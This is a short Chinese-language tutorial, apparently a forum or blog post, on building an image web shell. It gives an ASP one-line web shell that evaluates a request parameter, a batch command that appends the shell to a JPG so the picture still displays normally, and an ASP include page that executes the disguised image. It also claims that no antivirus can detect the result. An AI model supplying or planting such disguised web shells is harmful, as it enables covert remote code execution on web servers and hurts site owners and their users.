先看代码：
仅需几步：图片和一句话木马合并，制作可以正常显示的图片木马。
1、找一张图片，名字改成1.jpg
2、<%eval request(“a”)%>存为1.asp（就是一句话木马）
3、copy 1.jpg /b + 1.asp /a asp.jpg 存为1.bat文件

注：以上三个文件放在同一目录里面

复制当前目录下的1.jpg图片和当前目录下的1.asp文件并以ASCII代码的方式合并为 asp.jpg图片，运行1.bat，就会出现一个图片asp.jpg，现在这个asp.jpg就是已经做好的木马了。

这个图片外表很正常，用缩略图也看不出任何破绽，但是却非常的危险，让人防不胜防。

利用方法：新建一个asp.asp 内容为：

<!–#include file=”asp.jpg”–>

把asp.jpg 和 asp.asp 放在同一目录，然后访问： asp.asp   用这种方法，任何杀毒是搜不到的